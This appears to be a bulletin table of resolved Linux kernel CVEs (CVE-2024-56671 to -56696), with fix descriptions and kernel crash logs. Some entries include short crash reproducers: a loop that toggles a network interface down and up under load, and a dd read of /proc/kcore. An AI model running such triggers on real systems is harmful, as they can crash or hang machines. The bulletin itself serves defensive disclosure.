In the Linux kernel, the following vulnerability has been resolved: gpio: graniterapids: Fix vGPIO driver crash Move setting irq_chip.name from probe() function to the initialization of "irq_chip" struct in order to fix vGPIO driver crash during bootup. Crash was caused by unauthorized modification of irq_chip.name field where irq_chip struct was initialized as const. This behavior is a consequence of suboptimal implementation of gpio_irq_chip_set_chip(), which should be changed to avoid casting away const qualifier. Crash log: BUG: unable to handle page fault for address: ffffffffc0ba81c0 /#PF: supervisor write access in kernel mode /#PF: error_code(0x0003) - permissions violation CPU: 33 UID: 0 PID: 1075 Comm: systemd-udevd Not tainted 6.12.0-rc6-00077-g2e1b3cc9d7f7 #1 Hardware name: Intel Corporation Kaseyville RP/Kaseyville RP, BIOS KVLDCRB1.PGS.0026.D73.2410081258 10/08/2024 RIP: 0010:gnr_gpio_probe+0x171/0x220 [gpio_graniterapids] | 2024-12-27 | not yet calculated | CVE-2024-56671 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: Fix UAF in blkcg_unpin_online() blkcg_unpin_online() walks up the blkcg hierarchy putting the online pin. To walk up, it uses blkcg_parent(blkcg) but it was calling that after blkcg_destroy_blkgs(blkcg) which could free the blkcg, leading to the following UAF: ================================================================== BUG: KASAN: slab-use-after-free in blkcg_unpin_online+0x15a/0x270 Read of size 8 at addr ffff8881057678c0 by task kworker/9:1/117 CPU: 9 UID: 0 PID: 117 Comm: kworker/9:1 Not tainted 6.13.0-rc1-work-00182-gb8f52214c61a-dirty #48 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS unknown 02/02/2022 Workqueue: cgwb_release cgwb_release_workfn Call Trace: <TASK> dump_stack_lvl+0x27/0x80 print_report+0x151/0x710 kasan_report+0xc0/0x100 blkcg_unpin_online+0x15a/0x270 cgwb_release_workfn+0x194/0x480 process_scheduled_works+0x71b/0xe20 worker_thread+0x82a/0xbd0 kthread+0x242/0x2c0 ret_from_fork+0x33/0x70 ret_from_fork_asm+0x1a/0x30 </TASK> ... Freed by task 1944: kasan_save_track+0x2b/0x70 kasan_save_free_info+0x3c/0x50 __kasan_slab_free+0x33/0x50 kfree+0x10c/0x330 css_free_rwork_fn+0xe6/0xb30 process_scheduled_works+0x71b/0xe20 worker_thread+0x82a/0xbd0 kthread+0x242/0x2c0 ret_from_fork+0x33/0x70 ret_from_fork_asm+0x1a/0x30 Note that the UAF is not easy to trigger as the free path is indirected behind a couple RCU grace periods and a work item execution. I could only trigger it with artifical msleep() injected in blkcg_unpin_online(). Fix it by reading the parent pointer before destroying the blkcg's blkg's. | 2024-12-27 | not yet calculated | CVE-2024-56672 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: riscv: mm: Do not call pmd dtor on vmemmap page table teardown The vmemmap's, which is used for RV64 with SPARSEMEM_VMEMMAP, page tables are populated using pmd (page middle directory) hugetables. However, the pmd allocation is not using the generic mechanism used by the VMA code (e.g. pmd_alloc()), or the RISC-V specific create_pgd_mapping()/alloc_pmd_late(). Instead, the vmemmap page table code allocates a page, and calls vmemmap_set_pmd(). This results in that the pmd ctor is *not* called, nor would it make sense to do so. Now, when tearing down a vmemmap page table pmd, the cleanup code would unconditionally, and incorrectly call the pmd dtor, which results in a crash (best case). This issue was found when running the HMM selftests: | tools/testing/selftests/mm# ./test_hmm.sh smoke | ... # when unloading the test_hmm.ko module | page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10915b | flags: 0x1000000000000000(node=0|zone=1) | raw: 1000000000000000 0000000000000000 dead000000000122 0000000000000000 | raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000 | page dumped because: VM_BUG_ON_PAGE(ptdesc->pmd_huge_pte) | ------------[ cut here ]------------ | kernel BUG at include/linux/mm.h:3080! | Kernel BUG [#1] | Modules linked in: test_hmm(-) sch_fq_codel fuse drm drm_panel_orientation_quirks backlight dm_mod | CPU: 1 UID: 0 PID: 514 Comm: modprobe Tainted: G W 6.12.0-00982-gf2a4f1682d07 #2 | Tainted: [W]=WARN | Hardware name: riscv-virtio qemu/qemu, BIOS 2024.10 10/01/2024 | epc : remove_pgd_mapping+0xbec/0x1070 | ra : remove_pgd_mapping+0xbec/0x1070 | epc : ffffffff80010a68 ra : ffffffff80010a68 sp : ff20000000a73940 | gp : ffffffff827b2d88 tp : ff6000008785da40 t0 : ffffffff80fbce04 | t1 : 0720072007200720 t2 : 706d756420656761 s0 : ff20000000a73a50 | s1 : ff6000008915cff8 a0 : 0000000000000039 a1 : 0000000000000008 | a2 : ff600003fff0de20 a3 : 0000000000000000 a4 : 0000000000000000 | a5 : 0000000000000000 a6 : c0000000ffffefff a7 : ffffffff824469b8 | s2 : ff1c0000022456c0 s3 : ff1ffffffdbfffff s4 : ff6000008915c000 | s5 : ff6000008915c000 s6 : ff6000008915c000 s7 : ff1ffffffdc00000 | s8 : 0000000000000001 s9 : ff1ffffffdc00000 s10: ffffffff819a31f0 | s11: ffffffffffffffff t3 : ffffffff8000c950 t4 : ff60000080244f00 | t5 : ff60000080244000 t6 : ff20000000a73708 | status: 0000000200000120 badaddr: ffffffff80010a68 cause: 0000000000000003 | [<ffffffff80010a68>] remove_pgd_mapping+0xbec/0x1070 | [<ffffffff80fd238e>] vmemmap_free+0x14/0x1e | [<ffffffff8032e698>] section_deactivate+0x220/0x452 | [<ffffffff8032ef7e>] sparse_remove_section+0x4a/0x58 | [<ffffffff802f8700>] __remove_pages+0x7e/0xba | [<ffffffff803760d8>] memunmap_pages+0x2bc/0x3fe | [<ffffffff02a3ca28>] dmirror_device_remove_chunks+0x2ea/0x518 [test_hmm] | [<ffffffff02a3e026>] hmm_dmirror_exit+0x3e/0x1018 [test_hmm] | [<ffffffff80102c14>] __riscv_sys_delete_module+0x15a/0x2a6 | [<ffffffff80fd020c>] do_trap_ecall_u+0x1f2/0x266 | [<ffffffff80fde0a2>] _new_vmalloc_restore_context_a0+0xc6/0xd2 | Code: bf51 7597 0184 8593 76a5 854a 4097 0029 80e7 2c00 (9002) 7597 | ---[ end trace 0000000000000000 ]--- | Kernel panic - not syncing: Fatal exception in interrupt Add a check to avoid calling the pmd dtor, if the calling context is vmemmap_free(). | 2024-12-27 | not yet calculated | CVE-2024-56673 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: virtio_net: correct netdev_tx_reset_queue() invocation point When virtnet_close is followed by virtnet_open, some TX completions can possibly remain unconsumed, until they are finally processed during the first NAPI poll after the netdev_tx_reset_queue(), resulting in a crash [1]. Commit b96ed2c97c79 ("virtio_net: move netdev_tx_reset_queue() call before RX napi enable") was not sufficient to eliminate all BQL crash cases for virtio-net. This issue can be reproduced with the latest net-next master by running: `while :; do ip l set DEV down; ip l set DEV up; done` under heavy network TX load from inside the machine. netdev_tx_reset_queue() can actually be dropped from virtnet_open path; the device is not stopped in any case. For BQL core part, it's just like traffic nearly ceases to exist for some period. For stall detector added to BQL, even if virtnet_close could somehow lead to some TX completions delayed for long, followed by virtnet_open, we can just take it as stall as mentioned in commit 6025b9135f7a ("net: dqs: add NIC stall detector based on BQL"). Note also that users can still reset stall_max via sysfs. So, drop netdev_tx_reset_queue() from virtnet_enable_queue_pair(). This eliminates the BQL crashes. As a result, netdev_tx_reset_queue() is now explicitly required in freeze/restore path. This patch adds it to immediately after free_unused_bufs(), following the rule of thumb: netdev_tx_reset_queue() should follow any SKB freeing not followed by netdev_tx_completed_queue(). This seems the most consistent and streamlined approach, and now netdev_tx_reset_queue() runs whenever free_unused_bufs() is done. [1]: ------------[ cut here ]------------ kernel BUG at lib/dynamic_queue_limits.c:99! Oops: invalid opcode: 0000 [#1] PREEMPT SMP NOPTI CPU: 7 UID: 0 PID: 1598 Comm: ip Tainted: G N 6.12.0net-next_main+ #2 Tainted: [N]=TEST Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), \ BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:dql_completed+0x26b/0x290 Code: b7 c2 49 89 e9 44 89 da 89 c6 4c 89 d7 e8 ed 17 47 00 58 65 ff 0d 4d 27 90 7e 0f 85 fd fe ff ff e8 ea 53 8d ff e9 f3 fe ff ff <0f> 0b 01 d2 44 89 d1 29 d1 ba 00 00 00 00 0f 48 ca e9 28 ff ff ff RSP: 0018:ffffc900002b0d08 EFLAGS: 00010297 RAX: 0000000000000000 RBX: ffff888102398c80 RCX: 0000000080190009 RDX: 0000000000000000 RSI: 000000000000006a RDI: 0000000000000000 RBP: ffff888102398c00 R08: 0000000000000000 R09: 0000000000000000 R10: 00000000000000ca R11: 0000000000015681 R12: 0000000000000001 R13: ffffc900002b0d68 R14: ffff88811115e000 R15: ffff8881107aca40 FS: 00007f41ded69500(0000) GS:ffff888667dc0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000556ccc2dc1a0 CR3: 0000000104fd8003 CR4: 0000000000772ef0 PKRU: 55555554 Call Trace: <IRQ> ? die+0x32/0x80 ? do_trap+0xd9/0x100 ? dql_completed+0x26b/0x290 ? dql_completed+0x26b/0x290 ? do_error_trap+0x6d/0xb0 ? dql_completed+0x26b/0x290 ? exc_invalid_op+0x4c/0x60 ? dql_completed+0x26b/0x290 ? asm_exc_invalid_op+0x16/0x20 ? dql_completed+0x26b/0x290 __free_old_xmit+0xff/0x170 [virtio_net] free_old_xmit+0x54/0xc0 [virtio_net] virtnet_poll+0xf4/0xe30 [virtio_net] ? __update_load_avg_cfs_rq+0x264/0x2d0 ? update_curr+0x35/0x260 ? reweight_entity+0x1be/0x260 __napi_poll.constprop.0+0x28/0x1c0 net_rx_action+0x329/0x420 ? enqueue_hrtimer+0x35/0x90 ? trace_hardirqs_on+0x1d/0x80 ? kvm_sched_clock_read+0xd/0x20 ? sched_clock+0xc/0x30 ? kvm_sched_clock_read+0xd/0x20 ? sched_clock+0xc/0x30 ? sched_clock_cpu+0xd/0x1a0 handle_softirqs+0x138/0x3e0 do_softirq.part.0+0x89/0xc0 </IRQ> <TASK> __local_bh_enable_ip+0xa7/0xb0 virtnet_open+0xc8/0x310 [virtio_net] __dev_open+0xfa/0x1b0 __dev_change_flags+0x1de/0x250 dev_change_flags+0x22/0x60 do_setlink.isra.0+0x2df/0x10b0 ? rtnetlink_rcv_msg+0x34f/0x3f0 ? netlink_rcv_skb+0x54/0x100 ? netlink_unicas ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56674 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf: Fix UAF via mismatching bpf_prog/attachment RCU flavors Uprobes always use bpf_prog_run_array_uprobe() under tasks-trace-RCU protection. But it is possible to attach a non-sleepable BPF program to a uprobe, and non-sleepable BPF programs are freed via normal RCU (see __bpf_prog_put_noref()). This leads to UAF of the bpf_prog because a normal RCU grace period does not imply a tasks-trace-RCU grace period. Fix it by explicitly waiting for a tasks-trace-RCU grace period after removing the attachment of a bpf_prog to a perf_event. | 2024-12-27 | not yet calculated | CVE-2024-56675 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: thermal: testing: Initialize some variables annoteded with _free() Variables annotated with __free() need to be initialized if the function can return before they get updated for the first time or the attempt to free the memory pointed to by them upon function return may crash the kernel. Fix this issue in some places in the thermal testing code. | 2024-12-28 | not yet calculated | CVE-2024-56676 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: powerpc/fadump: Move fadump_cma_init to setup_arch() after initmem_init() During early init CMA_MIN_ALIGNMENT_BYTES can be PAGE_SIZE, since pageblock_order is still zero and it gets initialized later during initmem_init() e.g. setup_arch() -> initmem_init() -> sparse_init() -> set_pageblock_order() One such use case where this causes issue is - early_setup() -> early_init_devtree() -> fadump_reserve_mem() -> fadump_cma_init() This causes CMA memory alignment check to be bypassed in cma_init_reserved_mem(). Then later cma_activate_area() can hit a VM_BUG_ON_PAGE(pfn & ((1 << order) - 1)) if the reserved memory area was not pageblock_order aligned. Fix it by moving the fadump_cma_init() after initmem_init(), where other such cma reservations also gets called. <stack trace> ============== page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10010 flags: 0x13ffff800000000(node=1|zone=0|lastcpupid=0x7ffff) CMA raw: 013ffff800000000 5deadbeef0000100 5deadbeef0000122 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: VM_BUG_ON_PAGE(pfn & ((1 << order) - 1)) ------------[ cut here ]------------ kernel BUG at mm/page_alloc.c:778! Call Trace: __free_one_page+0x57c/0x7b0 (unreliable) free_pcppages_bulk+0x1a8/0x2c8 free_unref_page_commit+0x3d4/0x4e4 free_unref_page+0x458/0x6d0 init_cma_reserved_pageblock+0x114/0x198 cma_init_reserved_areas+0x270/0x3e0 do_one_initcall+0x80/0x2f8 kernel_init_freeable+0x33c/0x530 kernel_init+0x34/0x26c ret_from_kernel_user_thread+0x14/0x1c | 2024-12-28 | not yet calculated | CVE-2024-56677 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: powerpc/mm/fault: Fix kfence page fault reporting copy_from_kernel_nofault() can be called when doing read of /proc/kcore. /proc/kcore can have some unmapped kfence objects which when read via copy_from_kernel_nofault() can cause page faults. Since *_nofault() functions define their own fixup table for handling fault, use that instead of asking kfence to handle such faults. Hence we search the exception tables for the nip which generated the fault. If there is an entry then we let the fixup table handler handle the page fault by returning an error from within ___do_page_fault(). This can be easily triggered if someone tries to do dd from /proc/kcore. eg. dd if=/proc/kcore of=/dev/null bs=1M Some example false negatives: =============================== BUG: KFENCE: invalid read in copy_from_kernel_nofault+0x9c/0x1a0 Invalid read at 0xc0000000fdff0000: copy_from_kernel_nofault+0x9c/0x1a0 0xc00000000665f950 read_kcore_iter+0x57c/0xa04 proc_reg_read_iter+0xe4/0x16c vfs_read+0x320/0x3ec ksys_read+0x90/0x154 system_call_exception+0x120/0x310 system_call_vectored_common+0x15c/0x2ec BUG: KFENCE: use-after-free read in copy_from_kernel_nofault+0x9c/0x1a0 Use-after-free read at 0xc0000000fe050000 (in kfence-#2): copy_from_kernel_nofault+0x9c/0x1a0 0xc00000000665f950 read_kcore_iter+0x57c/0xa04 proc_reg_read_iter+0xe4/0x16c vfs_read+0x320/0x3ec ksys_read+0x90/0x154 system_call_exception+0x120/0x310 system_call_vectored_common+0x15c/0x2ec | 2024-12-28 | not yet calculated | CVE-2024-56678 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: handle otx2_mbox_get_rsp errors in otx2_common.c Add error pointer check after calling otx2_mbox_get_rsp(). | 2024-12-28 | not yet calculated | CVE-2024-56679 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: intel/ipu6: do not handle interrupts when device is disabled Some IPU6 devices have shared interrupts. We need to handle properly case when interrupt is triggered from other device on shared irq line and IPU6 itself disabled. In such case we get 0xffffffff from ISR_STATUS register and handle all irq's cases, for what we are not not prepared and usually hang the whole system. To avoid the issue use pm_runtime_get_if_active() to check if the device is enabled and prevent suspending it when we handle irq until the end of irq. Additionally use synchronize_irq() in suspend | 2024-12-28 | not yet calculated | CVE-2024-56680 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: crypto: bcm - add error check in the ahash_hmac_init function The ahash_init functions may return fails. The ahash_hmac_init should not return ok when ahash_init returns error. For an example, ahash_init will return -ENOMEM when allocation memory is error. | 2024-12-28 | not yet calculated | CVE-2024-56681 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: irqchip/riscv-aplic: Prevent crash when MSI domain is missing If the APLIC driver is probed before the IMSIC driver, the parent MSI domain will be missing, which causes a NULL pointer dereference in msi_create_device_irq_domain(). Avoid this by deferring probe until the parent MSI domain is available. Use dev_err_probe() to avoid printing an error message when returning -EPROBE_DEFER. | 2024-12-28 | not yet calculated | CVE-2024-56682 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/vc4: hdmi: Avoid hang with debug registers when suspended Trying to read /sys/kernel/debug/dri/1/hdmi1_regs when the hdmi is disconnected results in a fatal system hang. This is due to the pm suspend code disabling the dvp clock. That is just a gate of the 108MHz clock in DVP_HT_RPI_MISC_CONFIG, which results in accesses hanging AXI bus. Protect against this. | 2024-12-28 | not yet calculated | CVE-2024-56683 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mailbox: mtk-cmdq: fix wrong use of sizeof in cmdq_get_clocks() It should be size of the struct clk_bulk_data, not data pointer pass to devm_kcalloc(). | 2024-12-28 | not yet calculated | CVE-2024-56684 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: Check num_codecs is not zero to avoid panic during probe Following commit 13f58267cda3 ("ASoC: soc.h: don't create dummy Component via COMP_DUMMY()"), COMP_DUMMY() became an array with zero length, and only gets populated with the dummy struct after the card is registered. Since the sound card driver's probe happens before the card registration, accessing any of the members of a dummy component during probe will result in undefined behavior. This can be observed in the mt8188 and mt8195 machine sound drivers. By omitting a dai link subnode in the sound card's node in the Devicetree, the default uninitialized dummy codec is used, and when its dai_name pointer gets passed to strcmp() it results in a null pointer dereference and a kernel panic. In addition to that, set_card_codec_info() in the generic helpers file, mtk-soundcard-driver.c, will populate a dai link with a dummy codec when a dai link node is present in DT but with no codec property. The result is that at probe time, a dummy codec can either be uninitialized with num_codecs = 0, or be an initialized dummy codec, with num_codecs = 1 and dai_name = "snd-soc-dummy-dai". In order to accommodate for both situations, check that num_codecs is not zero before accessing the codecs' fields but still check for the codec's dai name against "snd-soc-dummy-dai" as needed. While at it, also drop the check that dai_name is not null in the mt8192 driver, introduced in commit 4d4e1b6319e5 ("ASoC: mediatek: mt8192: Check existence of dai_name before dereferencing"), as it is actually redundant given the preceding num_codecs != 0 check. | 2024-12-28 | not yet calculated | CVE-2024-56685 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ext4: fix race in buffer_head read fault injection When I enabled ext4 debug for fault injection testing, I encountered the following warning: EXT4-fs error (device sda): ext4_read_inode_bitmap:201: comm fsstress: Cannot read inode bitmap - block_group = 8, inode_bitmap = 1051 WARNING: CPU: 0 PID: 511 at fs/buffer.c:1181 mark_buffer_dirty+0x1b3/0x1d0 The root cause of the issue lies in the improper implementation of ext4's buffer_head read fault injection. The actual completion of buffer_head read and the buffer_head fault injection are not atomic, which can lead to the uptodate flag being cleared on normally used buffer_heads in race conditions. [CPU0] [CPU1] [CPU2] ext4_read_inode_bitmap ext4_read_bh() <bh read complete> ext4_read_inode_bitmap if (buffer_uptodate(bh)) return bh jbd2_journal_commit_transaction __jbd2_journal_refile_buffer __jbd2_journal_unfile_buffer __jbd2_journal_temp_unlink_buffer ext4_simulate_fail_bh() clear_buffer_uptodate mark_buffer_dirty <report warning> WARN_ON_ONCE(!buffer_uptodate(bh)) The best approach would be to perform fault injection in the IO completion callback function, rather than after IO completion. However, the IO completion callback function cannot get the fault injection code in sb. Fix it by passing the result of fault injection into the bh read function, we simulate faults within the bh read function itself. This requires adding an extra parameter to the bh read functions that need fault injection. | 2024-12-28 | not yet calculated | CVE-2024-56686 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: musb: Fix hardware lockup on first Rx endpoint request There is a possibility that a request's callback could be invoked from usb_ep_queue() (call trace below, supplemented with missing calls): req->complete from usb_gadget_giveback_request (drivers/usb/gadget/udc/core.c:999) usb_gadget_giveback_request from musb_g_giveback (drivers/usb/musb/musb_gadget.c:147) musb_g_giveback from rxstate (drivers/usb/musb/musb_gadget.c:784) rxstate from musb_ep_restart (drivers/usb/musb/musb_gadget.c:1169) musb_ep_restart from musb_ep_restart_resume_work (drivers/usb/musb/musb_gadget.c:1176) musb_ep_restart_resume_work from musb_queue_resume_work (drivers/usb/musb/musb_core.c:2279) musb_queue_resume_work from musb_gadget_queue (drivers/usb/musb/musb_gadget.c:1241) musb_gadget_queue from usb_ep_queue (drivers/usb/gadget/udc/core.c:300) According to the docstring of usb_ep_queue(), this should not happen: "Note that @req's ->complete() callback must never be called from within usb_ep_queue() as that can create deadlock situations." In fact, a hardware lockup might occur in the following sequence: 1. The gadget is initialized using musb_gadget_enable(). 2. Meanwhile, a packet arrives, and the RXPKTRDY flag is set, raising an interrupt. 3. If IRQs are enabled, the interrupt is handled, but musb_g_rx() finds an empty queue (next_request() returns NULL). The interrupt flag has already been cleared by the glue layer handler, but the RXPKTRDY flag remains set. 4. The first request is enqueued using usb_ep_queue(), leading to the call of req->complete(), as shown in the call trace above. 5. If the callback enables IRQs and another packet is waiting, step (3) repeats. The request queue is empty because usb_g_giveback() removes the request before invoking the callback. 6. The endpoint remains locked up, as the interrupt triggered by hardware setting the RXPKTRDY flag has been handled, but the flag itself remains set. For this scenario to occur, it is only necessary for IRQs to be enabled at some point during the complete callback. This happens with the USB Ethernet gadget, whose rx_complete() callback calls netif_rx(). If called in the task context, netif_rx() disables the bottom halves (BHs). When the BHs are re-enabled, IRQs are also enabled to allow soft IRQs to be processed. The gadget itself is initialized at module load (or at boot if built-in), but the first request is enqueued when the network interface is brought up, triggering rx_complete() in the task context via ioctl(). If a packet arrives while the interface is down, it can prevent the interface from receiving any further packets from the USB host. The situation is quite complicated with many parties involved. This particular issue can be resolved in several possible ways: 1. Ensure that callbacks never enable IRQs. This would be difficult to enforce, as discovering how netif_rx() interacts with interrupts was already quite challenging and u_ether is not the only function driver. Similar "bugs" could be hidden in other drivers as well. 2. Disable MUSB interrupts in musb_g_giveback() before calling the callback and re-enable them afterwars (by calling musb_{dis,en}able_interrupts(), for example). This would ensure that MUSB interrupts are not handled during the callback, even if IRQs are enabled. In fact, it would allow IRQs to be enabled when releasing the lock. However, this feels like an inelegant hack. 3. Modify the interrupt handler to clear the RXPKTRDY flag if the request queue is empty. While this approach also feels like a hack, it wastes CPU time by attempting to handle incoming packets when the software is not ready to process them. 4. Flush the Rx FIFO instead of calling rxstate() in musb_ep_restart(). This ensures that the hardware can receive packets when there is at least one request in the queue. Once I ---truncated--- | 2024-12-28 | not yet calculated | CVE-2024-56687 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: sunrpc: clear XPRT_SOCK_UPD_TIMEOUT when reset transport Since transport->sock has been set to NULL during reset transport, XPRT_SOCK_UPD_TIMEOUT also needs to be cleared. Otherwise, the xs_tcp_set_socket_timeouts() may be triggered in xs_tcp_send_request() to dereference the transport->sock that has been set to NULL. | 2024-12-28 | not yet calculated | CVE-2024-56688 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: epf-mhi: Avoid NULL dereference if DT lacks 'mmio' If platform_get_resource_byname() fails and returns NULL because DT lacks an 'mmio' property for the MHI endpoint, dereferencing res->start will cause a NULL pointer access. Add a check to prevent it. [kwilczynski: error message update per the review feedback] [bhelgaas: commit log] | 2024-12-28 | not yet calculated | CVE-2024-56689 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: crypto: pcrypt - Call crypto layer directly when padata_do_parallel() return -EBUSY Since commit 8f4f68e788c3 ("crypto: pcrypt - Fix hungtask for PADATA_RESET"), the pcrypt encryption and decryption operations return -EAGAIN when the CPU goes online or offline. In alg_test(), a WARN is generated when pcrypt_aead_decrypt() or pcrypt_aead_encrypt() returns -EAGAIN, the unnecessary panic will occur when panic_on_warn set 1. Fix this issue by calling crypto layer directly without parallelization in that case. | 2024-12-28 | not yet calculated | CVE-2024-56690 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mfd: intel_soc_pmic_bxtwc: Use IRQ domain for USB Type-C device While design wise the idea of converting the driver to use the hierarchy of the IRQ chips is correct, the implementation has (inherited) flaws. This was unveiled when platform_get_irq() had started WARN() on IRQ 0 that is supposed to be a Linux IRQ number (also known as vIRQ). Rework the driver to respect IRQ domain when creating each MFD device separately, as the domain is not the same for all of them. | 2024-12-28 | not yet calculated | CVE-2024-56691 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on node blkaddr in truncate_node() syzbot reports a f2fs bug as below: ------------[ cut here ]------------ kernel BUG at fs/f2fs/segment.c:2534! RIP: 0010:f2fs_invalidate_blocks+0x35f/0x370 fs/f2fs/segment.c:2534 Call Trace: truncate_node+0x1ae/0x8c0 fs/f2fs/node.c:909 f2fs_remove_inode_page+0x5c2/0x870 fs/f2fs/node.c:1288 f2fs_evict_inode+0x879/0x15c0 fs/f2fs/inode.c:856 evict+0x4e8/0x9b0 fs/inode.c:723 f2fs_handle_failed_inode+0x271/0x2e0 fs/f2fs/inode.c:986 f2fs_create+0x357/0x530 fs/f2fs/namei.c:394 lookup_open fs/namei.c:3595 [inline] open_last_lookups fs/namei.c:3694 [inline] path_openat+0x1c03/0x3590 fs/namei.c:3930 do_filp_open+0x235/0x490 fs/namei.c:3960 do_sys_openat2+0x13e/0x1d0 fs/open.c:1415 do_sys_open fs/open.c:1430 [inline] __do_sys_openat fs/open.c:1446 [inline] __se_sys_openat fs/open.c:1441 [inline] __x64_sys_openat+0x247/0x2a0 fs/open.c:1441 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0010:f2fs_invalidate_blocks+0x35f/0x370 fs/f2fs/segment.c:2534 The root cause is: on a fuzzed image, blkaddr in nat entry may be corrupted, then it will cause system panic when using it in f2fs_invalidate_blocks(), to avoid this, let's add sanity check on nat blkaddr in truncate_node(). | 2024-12-28 | not yet calculated | CVE-2024-56692 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: brd: defer automatic disk creation until module initialization succeeds My colleague Wupeng found the following problems during fault injection: BUG: unable to handle page fault for address: fffffbfff809d073 PGD 6e648067 P4D 123ec8067 PUD 123ec4067 PMD 100e38067 PTE 0 Oops: Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI CPU: 5 UID: 0 PID: 755 Comm: modprobe Not tainted 6.12.0-rc3+ #17 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 RIP: 0010:__asan_load8+0x4c/0xa0 ... Call Trace: <TASK> blkdev_put_whole+0x41/0x70 bdev_release+0x1a3/0x250 blkdev_release+0x11/0x20 __fput+0x1d7/0x4a0 task_work_run+0xfc/0x180 syscall_exit_to_user_mode+0x1de/0x1f0 do_syscall_64+0x6b/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e loop_init() is calling loop_add() after __register_blkdev() succeeds and is ignoring disk_add() failure from loop_add(), for loop_add() failure is not fatal and successfully created disks are already visible to bdev_open(). brd_init() is currently calling brd_alloc() before __register_blkdev() succeeds and is releasing successfully created disks when brd_init() returns an error. This can cause UAF for the latter two case: case 1: T1: modprobe brd brd_init brd_alloc(0) // success add_disk disk_scan_partitions bdev_file_open_by_dev // alloc file fput // won't free until back to userspace brd_alloc(1) // failed since mem alloc error inject // error path for modprobe will release code segment // back to userspace __fput blkdev_release bdev_release blkdev_put_whole bdev->bd_disk->fops->release // fops is freed now, UAF! case 2: T1: T2: modprobe brd brd_init brd_alloc(0) // success open(/dev/ram0) brd_alloc(1) // fail // error path for modprobe close(/dev/ram0) ... /* UAF! */ bdev->bd_disk->fops->release Fix this problem by following what loop_init() does. Besides, reintroduce brd_devices_mutex to help serialize modifications to brd_list. | 2024-12-28 | not yet calculated | CVE-2024-56693 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf: fix recursive lock when verdict program return SK_PASS When the stream_verdict program returns SK_PASS, it places the received skb into its own receive queue, but a recursive lock eventually occurs, leading to an operating system deadlock. This issue has been present since v6.9. ''' sk_psock_strp_data_ready write_lock_bh(&sk->sk_callback_lock) strp_data_ready strp_read_sock read_sock -> tcp_read_sock strp_recv cb.rcv_msg -> sk_psock_strp_read # now stream_verdict return SK_PASS without peer sock assign __SK_PASS = sk_psock_map_verd(SK_PASS, NULL) sk_psock_verdict_apply sk_psock_skb_ingress_self sk_psock_skb_ingress_enqueue sk_psock_data_ready read_lock_bh(&sk->sk_callback_lock) <= dead lock ''' This topic has been discussed before, but it has not been fixed. Previous discussion: https://lore.kernel.org/all/6684a5864ec86_403d20898@john.notmuch | 2024-12-28 | not yet calculated | CVE-2024-56694 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Use dynamic allocation for CU occupancy array in 'kfd_get_cu_occupancy()' The `kfd_get_cu_occupancy` function previously declared a large `cu_occupancy` array as a local variable, which could lead to stack overflows due to excessive stack usage. This commit replaces the static array allocation with dynamic memory allocation using `kcalloc`, thereby reducing the stack size. This change avoids the risk of stack overflows in kernel space, in scenarios where `AMDGPU_MAX_QUEUES` is large. The allocated memory is freed using `kfree` before the function returns to prevent memory leaks. Fixes the below with gcc W=1: drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_process.c: In function 'kfd_get_cu_occupancy': drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_process.c:322:1: warning: the frame size of 1056 bytes is larger than 1024 bytes [-Wframe-larger-than=] 322 | } | ^ | 2024-12-28 | not yet calculated | CVE-2024-56695 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: core: Fix possible NULL dereference caused by kunit_kzalloc() kunit_kzalloc() may return a NULL pointer, dereferencing it without NULL check may lead to NULL dereference. Add NULL checks for all the kunit_kzalloc() in sound_kunit.c | 2024-12-28 | not yet calculated | CVE-2024-56696 |
| n/a -- n/a |
